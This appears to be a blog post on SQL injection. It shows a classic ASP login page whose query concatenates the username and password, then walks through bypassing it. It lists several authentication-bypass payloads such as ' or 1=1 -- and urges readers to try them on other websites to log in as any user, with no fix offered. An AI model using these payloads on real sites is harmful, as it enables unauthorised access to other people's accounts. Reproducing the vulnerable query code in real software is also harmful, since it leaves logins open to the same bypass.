Normally, inorder to make a login page, the web designer will write the following code.
login.htm
< html >
< body >
< form method=get action="logincheck.asp" >
< input type="text" name="login_name" >
< input type="text" name="pass" >
< input type="submit" value="sign in" >
< /form >
< /body >
< /html >
logincheck.asp
<@language="vbscript" >
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
% >
Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.
"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
Now if a user types his login name as "Vishal" and password as "tmp" then these values will pass to the asp page with post method and then the above query will become
"Select * from table1 where login=' Vishal ' and password=' tmp ' "
Thats fine. There will be an entry Vishal and tmp in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Vishal" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:
"Select * from table1 where login=' Vishal ' and password=' hi' or 'a'='a ' "
And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Vishal" !! You can try the following in the password text box if the above doesn't work for some websites:
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide
Vishal ' --
Vishal " --
or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Vishal" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!
1 comment:
how can we make a vulnerable sql code injection
Post a Comment